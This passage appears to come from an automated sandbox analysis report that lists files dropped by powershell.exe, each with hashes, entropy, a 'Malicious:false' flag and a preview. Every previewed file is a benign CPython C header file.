                                                                                                    Preview:#ifndef Py_CPYTHON_ERRORS_H..# error "this header file must not be included directly"..#endif..../* Error objects */..../* PyException_HEAD defines the initial segment of every exception class. */..#define PyException_HEAD PyObject_HEAD PyObject *dict;\.. PyObject *args; PyObject *notes; PyObject *traceback;\.. PyObject *context; PyObject *cause;\.. char suppress_context;....typedef struct {.. PyException_HEAD..} PyBaseExceptionObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *excs;..} PyBaseExceptionGroupObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *filename;.. PyObject *lineno;.. PyObject *offset;.. PyObject *end_lineno;.. PyObject *end_offset;.. PyObject *text;.. PyObject *print_file_and_line;..} PySyntaxErrorObject;....typedef struct {.. PyException_HEAD.. PyObject *msg;.. PyObject *name;.. PyObject *path;.. PyObject *name_from;..} PyImp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):459
                                                                                                    Entropy (8bit):5.152600348696546
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:BemmYxSnlF9rrCJp5NA1Jocl4WWWVsE2I0cD:LmYMMLA1xhWTjI0cD
                                                                                                    MD5:BBC7515EBD44C181429DE06707AA39E0
                                                                                                    SHA1:3948330184B82E3BFB6390D0740B1F43A67CA1DD
                                                                                                    SHA-256:B8B42E4F39DBC5F267E8E1FF0C4A52B431A422E6CB58C2380826A0C478334316
                                                                                                    SHA-512:A4E6AF8F865B45A81D842558277382FFF5357EC6B97ABBBB5D6AC2D25942EEFACF321CE58615A3112D799CECD4AE9AB32CAE6D1B725A92A40797D2FD80C9622A
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_PYFPE_H..#define Py_PYFPE_H../* Header excluded from the stable API */..#ifndef Py_LIMITED_API..../* These macros used to do something when Python was built with --with-fpectl,.. * but support for that was dropped in 3.7. We continue to define them though,.. * to avoid breaking API users... */....#define PyFPE_START_PROTECT(err_string, leave_stmt)..#define PyFPE_END_PROTECT(v)....#endif /* !defined(Py_LIMITED_API) */..#endif /* !Py_PYFPE_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1514
                                                                                                    Entropy (8bit):5.057379170402737
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+wxibxSWidC7/VKwCfmC7C2gLS7tEVWMpKxNJ0Hl5vGDbHG5tF6i3HG5kP:+cgxrqC7/vCfmC7C2gW73Mwxozvcut4+
                                                                                                    MD5:C1A0DC707BC3107F9EB2C6E5315E2DDF
                                                                                                    SHA1:FBC2E034644EA40C95D5F69615C7FA90DA38EAD1
                                                                                                    SHA-256:A7135A048A548202B90582D5F39FF7BCB4456861D4C69640F844A86284F31031
                                                                                                    SHA-512:F6C8593A05706D9ED6C4A3CB046425324EB4FDA675A29F68801DFB0C6AB8BB92E80E41D1A74627F3A0C4FE053F5D464AB1B3DB575756403FF0A70578510E3ABC
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PYFRAME_H..# error "this header file must not be included directly"..#endif....PyAPI_DATA(PyTypeObject) PyFrame_Type;....#define PyFrame_Check(op) Py_IS_TYPE((op), &PyFrame_Type)....PyAPI_FUNC(PyFrameObject *) PyFrame_GetBack(PyFrameObject *frame);..PyAPI_FUNC(PyObject *) PyFrame_GetLocals(PyFrameObject *frame);....PyAPI_FUNC(PyObject *) PyFrame_GetGlobals(PyFrameObject *frame);..PyAPI_FUNC(PyObject *) PyFrame_GetBuiltins(PyFrameObject *frame);....PyAPI_FUNC(PyObject *) PyFrame_GetGenerator(PyFrameObject *frame);..PyAPI_FUNC(int) PyFrame_GetLasti(PyFrameObject *frame);..PyAPI_FUNC(PyObject*) PyFrame_GetVar(PyFrameObject *frame, PyObject *name);..PyAPI_FUNC(PyObject*) PyFrame_GetVarString(PyFrameObject *frame, const char *name);..../* The following functions are for use by debuggers and other tools.. * implementing custom frame evaluators with PEP 523. */....struct _PyInterpreterFrame;..../* Returns the code object of the frame (strong reference)... * Does not raise
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3534
                                                                                                    Entropy (8bit):5.19569784275282
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PcgTHHiDGIa4t3zL1D/PWchz/cl/4j/JNtDb4O8RS4VC+7B4MQXStYZ:PcyiDGInzZDPWiOAj/Dp8Mc7BGXSuZ
                                                                                                    MD5:13A99D2EB897AED79A2CD18BEF9A7E27
                                                                                                    SHA1:FFF48239E805411C7C0B4831DCF4E700FEC2AF06
                                                                                                    SHA-256:E3D38D7856B32348F7DFFEDDDF1BA9B65749D7C71BBB931877C33559636B32B2
                                                                                                    SHA-512:02E319424ABE45A848E976AB21E6BBA2DF10AAF3A5E3CF3F628186C01A4217AA0E81575690C4BFF06DE50A67457F06A34ED5041FE630B8A82202728B667DBCA5
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PYLIFECYCLE_H..# error "this header file must not be included directly"..#endif..../* Py_FrozenMain is kept out of the Limited API until documented and present.. in all builds of Python */..PyAPI_FUNC(int) Py_FrozenMain(int argc, char **argv);..../* Only used by applications that embed the interpreter and need to.. * override the standard encoding determination mechanism.. */..Py_DEPRECATED(3.11) PyAPI_FUNC(int) Py_SetStandardStreamEncoding(.. const char *encoding,.. const char *errors);..../* PEP 432 Multi-phase initialization API (Private while provisional!) */....PyAPI_FUNC(PyStatus) Py_PreInitialize(.. const PyPreConfig *src_config);..PyAPI_FUNC(PyStatus) Py_PreInitializeFromBytesArgs(.. const PyPreConfig *src_config,.. Py_ssize_t argc,.. char **argv);..PyAPI_FUNC(PyStatus) Py_PreInitializeFromArgs(.. const PyPreConfig *src_config,.. Py_ssize_t argc,.. wchar_t **argv);....PyAPI_FUNC(int) _Py_IsCoreInitialized(void);....../* Initializ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3477
                                                                                                    Entropy (8bit):5.1286140259952795
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Wcgj7h1hKfuuw0hiNmpNzTHo7G97yXQLFUuGliSsvQdNZd65liN3q7lcPRsA4G4W:Wc4fwsr8HTwQA1XNZ8z030A4G4ogJy
                                                                                                    MD5:E5E62995E21FDDB3F0B29DDAC77D7C9C
                                                                                                    SHA1:ABFE1179761F2E7F714209DD84DE7CD0C2B80C69
                                                                                                    SHA-256:4471EE830A01532450D95B83003DC2A8319267FB5ABBFBDEA20133DB0E640831
                                                                                                    SHA-512:512C7A37D6AAF55431746BAD694A0BCF5BEC0D72CAC8FAECD808C8B733DB9A72AB00808E2D21A4DB5E48464FBBB4CF7F4BD75157E66EE7EC3859866408EBDCFD
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PYMEM_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void *) PyMem_RawMalloc(size_t size);..PyAPI_FUNC(void *) PyMem_RawCalloc(size_t nelem, size_t elsize);..PyAPI_FUNC(void *) PyMem_RawRealloc(void *ptr, size_t new_size);..PyAPI_FUNC(void) PyMem_RawFree(void *ptr);..../* Try to get the allocators name set by _PyMem_SetupAllocators(). */..PyAPI_FUNC(const char*) _PyMem_GetCurrentAllocatorName(void);..../* strdup() using PyMem_RawMalloc() */..PyAPI_FUNC(char *) _PyMem_RawStrdup(const char *str);..../* strdup() using PyMem_Malloc() */..PyAPI_FUNC(char *) _PyMem_Strdup(const char *str);..../* wcsdup() using PyMem_RawMalloc() */..PyAPI_FUNC(wchar_t*) _PyMem_RawWcsdup(const wchar_t *str);......typedef enum {.. /* PyMem_RawMalloc(), PyMem_RawRealloc() and PyMem_RawFree() */.. PYMEM_DOMAIN_RAW,.... /* PyMem_Malloc(), PyMem_Realloc() and PyMem_Free() */.. PYMEM_DOMAIN_MEM,.... /* PyObject_Malloc(), PyObject_Realloc() and PyO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17684
                                                                                                    Entropy (8bit):4.890581331936376
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:aG3E5IBh8kGj9684NiyRLHD1f1o4h5sOVX79wDMc:aG3KIv8QrFU4hL79wIc
                                                                                                    MD5:97A2A818F681EC57524F50F49473EAC8
                                                                                                    SHA1:D95280BF15F51B3FE639063CF2E72D8772BD0648
                                                                                                    SHA-256:A2CE906E386C4896A862E4B2ED53733DE4E3C3C71923B50066E7A98AA099AEA0
                                                                                                    SHA-512:F5090E91C0E36E9A2C7223399306003C906B338BE67533D8BB0C28A18574AD94ED808C2E7B0FB5D2AD5E52A6BC50AA4DE6E8A2B422C876986CF8D29DE8BBF78D
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PYSTATE_H..# error "this header file must not be included directly"..#endif....../*..Runtime Feature Flags....Each flag indicate whether or not a specific runtime feature..is available in a given context. For example, forking the process..might not be allowed in the current interpreter (i.e. os.fork() would fail)...*/..../* Set if the interpreter share obmalloc runtime state.. with the main interpreter. */..#define Py_RTFLAGS_USE_MAIN_OBMALLOC (1UL << 5)..../* Set if import should check a module for subinterpreter support. */..#define Py_RTFLAGS_MULTI_INTERP_EXTENSIONS (1UL << 8)..../* Set if threads are allowed. */..#define Py_RTFLAGS_THREADS (1UL << 10)..../* Set if daemon threads are allowed. */..#define Py_RTFLAGS_DAEMON_THREADS (1UL << 11)..../* Set if os.fork() is allowed. */..#define Py_RTFLAGS_FORK (1UL << 15)..../* Set if os.exec*() is allowed. */..#define Py_RTFLAGS_EXEC (1UL << 16)......PyAPI_FUNC(int) _PyInterpreterState_HasFeature(PyInterpreterState
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5024
                                                                                                    Entropy (8bit):5.074670184727984
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:hfcTyk0Vew9T8e7ZkadKZ/cTJm2JMQMSoWa4wfe+kqXeqXcqW5lh:qTyk0Vew9we76adKZ/cT72eV5f
                                                                                                    MD5:8377103014C3A1366D9C20E911313843
                                                                                                    SHA1:2F4408695609B71F8BF8B2520F37AB7AA47F4199
                                                                                                    SHA-256:9C415BC5DFCB585DBEF4034C8F74F8FFAE2844CB7864E67A155C5F9923D3613C
                                                                                                    SHA-512:39863C5761EEBDDFC5DDF6CB4E93D72527451FD8FE7C41893A915C62C82162804AF7C97B1BAEC939B0F28DC7947D8F3236C31C0835734D34FBDE8B0F468EAC90
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PYTHONRUN_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) PyRun_SimpleStringFlags(const char *, PyCompilerFlags *);..PyAPI_FUNC(int) _PyRun_SimpleFileObject(.. FILE *fp,.. PyObject *filename,.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_AnyFileExFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) _PyRun_AnyFileObject(.. FILE *fp,.. PyObject *filename,.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_SimpleFileExFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_InteractiveOneFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_InteractiveOneObject(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1468
                                                                                                    Entropy (8bit):5.1184739568883915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:twxibGLeGV9oc9raLUq3oZJM4TNYoZyt0ZqcBZZnRKQBxFCdVK//rxmxyovn:tcgY9gkGIZdTNYoZyt0Z9fNRLPFCdV2w
                                                                                                    MD5:F1995D4E98C3E9167A5CE7D764F3240B
                                                                                                    SHA1:AE44E07C00227C214F637A795E02FEB2985589AB
                                                                                                    SHA-256:D5CBA29AC2A11A7D31296BD43E5262D28919C91FC1BDEDF9D60FECFDC7E100F0
                                                                                                    SHA-512:382841A57688CA36630A956820370C8C305E0A31D43F1C478CAF864A01618590511B667051D1884A12A1E3A9D8F772F65B0CF6145E1CC29F13ED213AA4051394
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_PYTHREAD_H..# error "this header file must not be included directly"..#endif....#define PYTHREAD_INVALID_THREAD_ID ((unsigned long)-1)....#ifdef HAVE_FORK../* Private function to reinitialize a lock at fork in the child process... Reset the lock to the unlocked state... Return 0 on success, return -1 on error. */..PyAPI_FUNC(int) _PyThread_at_fork_reinit(PyThread_type_lock *lock);..#endif /* HAVE_FORK */....#ifdef HAVE_PTHREAD_H.. /* Darwin needs pthread.h to know type name the pthread_key_t. */..# include <pthread.h>..# define NATIVE_TSS_KEY_T pthread_key_t..#elif defined(NT_THREADS).. /* In Windows, native TSS key type is DWORD,.. but hardcode the unsigned long to avoid errors for include directive... */..# define NATIVE_TSS_KEY_T unsigned long..#elif defined(HAVE_PTHREAD_STUBS)..# include "cpython/pthread_stubs.h"..# define NATIVE_TSS_KEY_T pthread_key_t..#else..# error "Require native threads. See https://bugs.python.o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12706
                                                                                                    Entropy (8bit):5.053869993604238
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:CY5n/tXWPKCv5HjsEyy5oUpKQbIAPhF48TWO9BSY1Y8Ca:d5lXWPKo5HjsxOoUppIAJFfWO31Ca
                                                                                                    MD5:6442F7D49EBD82022E00678B24EAB974
                                                                                                    SHA1:6915A57D6D2ECAAEDEA4CD2F00EE6F87A4B8BEC8
                                                                                                    SHA-256:D3E525D1BBD1DD162D834B691F4083D1BFD55288971CCB7BAE2F3ADF460ABBC8
                                                                                                    SHA-512:77BC2919D2F4C1B9692F3BC32F1BC16EC5162117C6895452788D14C47086E42FBEC7BDAA4653A32EBF033B129C0D50C27226E3550B7FCF2593F33C9D06240C14
                                                                                                    Malicious:false
                                                                                                    Preview:// The _PyTime_t API is written to use timestamp and timeout values stored in..// various formats and to read clocks...//..// The _PyTime_t type is an integer to support directly common arithmetic..// operations like t1 + t2...//..// The _PyTime_t API supports a resolution of 1 nanosecond. The _PyTime_t type..// is signed to support negative timestamps. The supported range is around..// [-292.3 years; +292.3 years]. Using the Unix epoch (January 1st, 1970), the..// supported date range is around [1677-09-21; 2262-04-11]...//..// Formats:..//..// * seconds..// * seconds as a floating pointer number (C double)..// * milliseconds (10^-3 seconds)..// * microseconds (10^-6 seconds)..// * 100 nanoseconds (10^-7 seconds)..// * nanoseconds (10^-9 seconds)..// * timeval structure, 1 microsecond resolution (10^-6 seconds)..// * timespec structure, 1 nanosecond resolution (10^-9 seconds)..//..// Integer overflows are detected and raise OverflowError. Conversion to a..// resolution worse than 1 na
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2218
                                                                                                    Entropy (8bit):4.946357429772549
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:IgcgVVCOiFNh+TyrAefqIFAlUeFoRLnktGH:5cKFi5nfqIFsaRLktGH
                                                                                                    MD5:890E79BA2C73F9EBE32EB8DBBD40EBBE
                                                                                                    SHA1:DB868B233630426A8AD75F06D910329606E4490C
                                                                                                    SHA-256:DAEA0D49FD15250859F20387B5BE4A6C85B6D01D810984D6B6E88263F328C069
                                                                                                    SHA-512:10A22F7F47876BFCF9AFD649C58839F245883679360F4D974F381A8B0DE244AC99A2245BD0CA0A99569912E3F3922E74622575CAB8281740E51E60B7B7713CDB
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_SETOBJECT_H..# error "this header file must not be included directly"..#endif..../* There are three kinds of entries in the table:....1. Unused: key == NULL and hash == 0..2. Dummy: key == dummy and hash == -1..3. Active: key != NULL and key != dummy and hash != -1....The hash field of Unused slots is always zero.....The hash field of Dummy slots are set to -1..meaning that dummy entries can be detected by..either entry->key==dummy or by entry->hash==-1...*/....#define PySet_MINSIZE 8....typedef struct {.. PyObject *key;.. Py_hash_t hash; /* Cached hash code of the key */..} setentry;..../* The SetObject data structure is shared by set and frozenset objects.....Invariant for sets:.. - hash is -1....Invariants for frozensets:.. - data is immutable... - hash is the hash of the frozenset or -1 if not computed yet.....*/....typedef struct {.. PyObject_HEAD.... Py_ssize_t fill; /* Number active and dummy entries*/.. Py_ssize_t us
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):505
                                                                                                    Entropy (8bit):4.99108483454011
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:BSa/HQxib2E5nF36+Iq+JeqlSdd0J+7/vAn7pF:bwxibjlIpidSe6pF
                                                                                                    MD5:58FECAA2AEB3B93428BEDAD8A547F304
                                                                                                    SHA1:8150D2BF365DC611ED5EB8E5DBD9FA576285DA94
                                                                                                    SHA-256:3DE1277A0D20F6C4258AD7B63C6AF9377D8EB2A66667CD1C5709616A1E466CB6
                                                                                                    SHA-512:8D49D9C0A691922B6B633487EE0EAEBB0368D122B1441959BCAEC745CEE8760C19A60C48DE33F402D18FD4B8916FD7138D20512A98C9B7DF29D8ACC62B9B0FDE
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_SYSMODULE_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(PyObject *) _PySys_GetAttr(PyThreadState *tstate,.. PyObject *name);....PyAPI_FUNC(size_t) _PySys_GetSizeOf(PyObject *);....typedef int(*Py_AuditHookFunction)(const char *, PyObject *, void *);....PyAPI_FUNC(int) PySys_Audit(.. const char *event,.. const char *argFormat,.. ...);..PyAPI_FUNC(int) PySys_AddAuditHook(Py_AuditHookFunction, void*);..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):460
                                                                                                    Entropy (8bit):4.99833604415647
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Bd2/HQxib2ERox0elhyLvu5lE02COWPdv:Uwxib+x0elhyLGE02ZWPdv
                                                                                                    MD5:AEE42A8030D1AD6C1C51BA1B9D26966E
                                                                                                    SHA1:C315296382339D2B5C05996A19B040EBA3F10417
                                                                                                    SHA-256:0C8306BDD6F4D5ECE7DB4F798024F8B59527C314FABB12ADD093BECD41E9F687
                                                                                                    SHA-512:816E8F902BD562D6EED69FEFF4B1DC90D34E95C8BD14DA0201D50D5A4FC3BC210A5B5925CE2F5E5DB7F033444789FD07F0C0A35C834F2B166426BFBF05367FA1
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_TRACEBACK_H..# error "this header file must not be included directly"..#endif....typedef struct _traceback PyTracebackObject;....struct _traceback {.. PyObject_HEAD.. PyTracebackObject *tb_next;.. PyFrameObject *tb_frame;.. int tb_lasti;.. int tb_lineno;..};....PyAPI_FUNC(int) _Py_DisplaySourceLine(PyObject *, PyObject *, int, int, int *, PyObject **);..PyAPI_FUNC(void) _PyTraceback_Add(const char *, const char *, int);..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1416
                                                                                                    Entropy (8bit):5.217048189115929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:plwxib+xpKtf4Ssh3XBEGeA08u+r5JZzaYSxshSp+J+yJ52zLJYSfJo1G7G:XcgYpQlM5FJZ2YZbJ+yjELJYyJo1eG
                                                                                                    MD5:48BD8528C0647BD552B28EBD495C270B
                                                                                                    SHA1:8AFA53CA1F4A25C3D6688104AA6403925FC87170
                                                                                                    SHA-256:71F4C54D1176F413217F0FC6041B3CFA86E76D692249E685DAE51427EFDC5818
                                                                                                    SHA-512:64496D931E0D79E925672B06632BCE950BA10FD7534AE0438EC88CBA717F3CCA6452544F6A129944C30DCFCE7AB65228F89C016C7F78E2DC64F09DEF8F1693F7
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_TUPLEOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. /* ob_item contains space for 'ob_size' elements... Items must normally not be NULL, except during construction when.. the tuple is not yet visible outside the function that builds it. */.. PyObject *ob_item[1];..} PyTupleObject;....PyAPI_FUNC(int) _PyTuple_Resize(PyObject **, Py_ssize_t);..PyAPI_FUNC(void) _PyTuple_MaybeUntrack(PyObject *);..../* Cast argument to PyTupleObject* type. */..#define _PyTuple_CAST(op) \.. (assert(PyTuple_Check(op)), _Py_CAST(PyTupleObject*, (op)))....// Macros and static inline functions, trading safety for speed....static inline Py_ssize_t PyTuple_GET_SIZE(PyObject *op) {.. PyTupleObject *tuple = _PyTuple_CAST(op);.. return Py_SIZE(tuple);..}..#define PyTuple_GET_SIZE(op) PyTuple_GET_SIZE(_PyObject_CAST(op))....#define PyTuple_GET_ITEM(op, index) (_PyTuple_CAST(op)->ob_item[(index)])...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35430
                                                                                                    Entropy (8bit):5.092850151891502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:J5I1esU8jW8KHFuRsilJpIpZdk50vSC3MP:01eKp+1a
                                                                                                    MD5:1AB0A7BFEC371897F3AA59B2F94BB100
                                                                                                    SHA1:02677FC1EA7177593B850352ACAE2DA5F4BC0EDC
                                                                                                    SHA-256:E30309CEF3121311C2909F98CAC72C681C9CD5D01289E10E86CD8F2172ABE8FE
                                                                                                    SHA-512:060877D68A78B189DFE3ED697B26662730CF9A843C21508961732E8F0DFCC5C22153E134E86C6CE8B3743794847C90F56310F72AF0B5FD9029148C7B61686434
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_UNICODEOBJECT_H..# error "this header file must not be included directly"..#endif..../* Py_UNICODE was the native Unicode storage format (code unit) used by.. Python and represents a single Unicode element in the Unicode type... With PEP 393, Py_UNICODE is deprecated and replaced with a.. typedef to wchar_t. */..#define PY_UNICODE_TYPE wchar_t../* Py_DEPRECATED(3.3) */ typedef wchar_t Py_UNICODE;..../* --- Internal Unicode Operations ---------------------------------------- */....// Static inline functions to work with surrogates..static inline int Py_UNICODE_IS_SURROGATE(Py_UCS4 ch) {.. return (0xD800 <= ch && ch <= 0xDFFF);..}..static inline int Py_UNICODE_IS_HIGH_SURROGATE(Py_UCS4 ch) {.. return (0xD800 <= ch && ch <= 0xDBFF);..}..static inline int Py_UNICODE_IS_LOW_SURROGATE(Py_UCS4 ch) {.. return (0xDC00 <= ch && ch <= 0xDFFF);..}....// Join two surrogate characters and return a single Py_UCS4 value...static inline Py_UCS4 Py_UNICODE_JOIN_SURROGA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):584
                                                                                                    Entropy (8bit):5.0246901215639435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:BB/HQxib2E5nlBKFvaKXXTnl2eh8XXQ/KIBPlUcEov:vwxibvBuaWhl8Q/K69P
                                                                                                    MD5:5D7E4BAB3FF84D842B58A08DD6BBFE4C
                                                                                                    SHA1:7F04AFE50508FC045172174004C2DB195AD6B0BA
                                                                                                    SHA-256:ED804F27A16BD31574F523D2539A6EFC97164AF32589DBE8363DF556E05754F2
                                                                                                    SHA-512:D86459922DB9E96CD985870F4EAC5549FEBC68FFBA296322E47FC4C12E86573AC635C0737997291254739CC719AC3584A9C24AF42770AE639234909C7D10E02C
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_WARNINGS_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) PyErr_WarnExplicitObject(.. PyObject *category,.. PyObject *message,.. PyObject *filename,.. int lineno,.. PyObject *module,.. PyObject *registry);....PyAPI_FUNC(int) PyErr_WarnExplicitFormat(.. PyObject *category,.. const char *filename, int lineno,.. const char *module, PyObject *registry,.. const char *format, ...);....// DEPRECATED: Use PyErr_WarnEx() instead...#define PyErr_Warn(category, msg) PyErr_WarnEx((category), (msg), 1)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2088
                                                                                                    Entropy (8bit):4.903128485553285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:gcgpsjf3htgu30YUqx9wdDYP7MYi3RAKaknYCShFL7fPxnBKiH:gcJx4Yj0dsPsakYHhFvfPxB/H
                                                                                                    MD5:0CF27CC20309F2A1CBE835F3DD0C522E
                                                                                                    SHA1:5DC1B78FEEE892C0BED430369C578E8FD038306B
                                                                                                    SHA-256:F970FDF00AEFFC1EF6BC757118540B60FDCA99406FC9A7A844409A0D845E7A3F
                                                                                                    SHA-512:E82A82EC26235E741A463C23A78D49FB3FF05827B5F264D0E27BAD40DF1ADFF523DBB6B785FDD88459D6211F617C9624DFA4119D7B378AAFE11475275D8EB28A
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_WEAKREFOBJECT_H..# error "this header file must not be included directly"..#endif..../* PyWeakReference is the base struct for the Python ReferenceType, ProxyType,.. * and CallableProxyType... */..struct _PyWeakReference {.. PyObject_HEAD.... /* The object to which this is a weak reference, or Py_None if none... * Note that this is a stealth reference: wr_object's refcount is.. * not incremented to reflect this pointer... */.. PyObject *wr_object;.... /* A callable to invoke when wr_object dies, or NULL if none. */.. PyObject *wr_callback;.... /* A cache for wr_object's hash code. As usual for hashes, this is -1.. * if the hash code isn't known yet... */.. Py_hash_t hash;.... /* If wr_object is weakly referenced, wr_object has a doubly-linked NULL-.. * terminated list of weak references to it. These are the list pointers... * If wr_object goes away, wr_object is set to Py_None, and these pointers.. * have no
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10036
                                                                                                    Entropy (8bit):5.122122897743283
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:nSAPj/BvFx1QZU5f5kU+HnVfBTyOC8nhnwN9okQcp7owPuB/JqM/5qRkAu/vZEO:nnP9NrQZAfsHnBwI5hZxaO
                                                                                                    MD5:5FEB604C021EB11655B90F0FC127431B
                                                                                                    SHA1:D6BE8187547F9E4D0B1F3DE2919C28808269A4DE
                                                                                                    SHA-256:19C1EA449F85E317BA55C23C95732A68F6203C777D8CF17F85C94D0C136EB9A2
                                                                                                    SHA-512:D20FAB6A92490D97DDFA762963DFB8F577FE4F92DB9A3C5F4C4FB65BA80B4C5535CAC7B446538379F0E3E95A02D907D584915B0ED64E6CDEB6B0002A9BE974A0
                                                                                                    Malicious:false
                                                                                                    Preview:/* datetime.h.. */..#ifndef Py_LIMITED_API..#ifndef DATETIME_H..#define DATETIME_H..#ifdef __cplusplus..extern "C" {..#endif..../* Fields are packed into successive bytes, each viewed as unsigned and.. * big-endian, unless otherwise noted:.. *.. * byte offset.. * 0 year 2 bytes, 1-9999.. * 2 month 1 byte, 1-12.. * 3 day 1 byte, 1-31.. * 4 hour 1 byte, 0-23.. * 5 minute 1 byte, 0-59.. * 6 second 1 byte, 0-59.. * 7 usecond 3 bytes, 0-999999.. * 10.. */..../* # of bytes for year, month, and day. */..#define _PyDateTime_DATE_DATASIZE 4..../* # of bytes for hour, minute, second, and usecond. */..#define _PyDateTime_TIME_DATASIZE 6..../* # of bytes for year, month, day, hour, minute, second, and usecond. */..#define _PyDateTime_DATETIME_DATASIZE 10......typedef struct..{.. PyObject_HEAD.. Py_hash_t hashcode; /* -1 when unknown */.. int days; /* -MAX_DELTA_DAYS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3180
                                                                                                    Entropy (8bit):5.212921496890911
                                                                                                    Encrypted:false
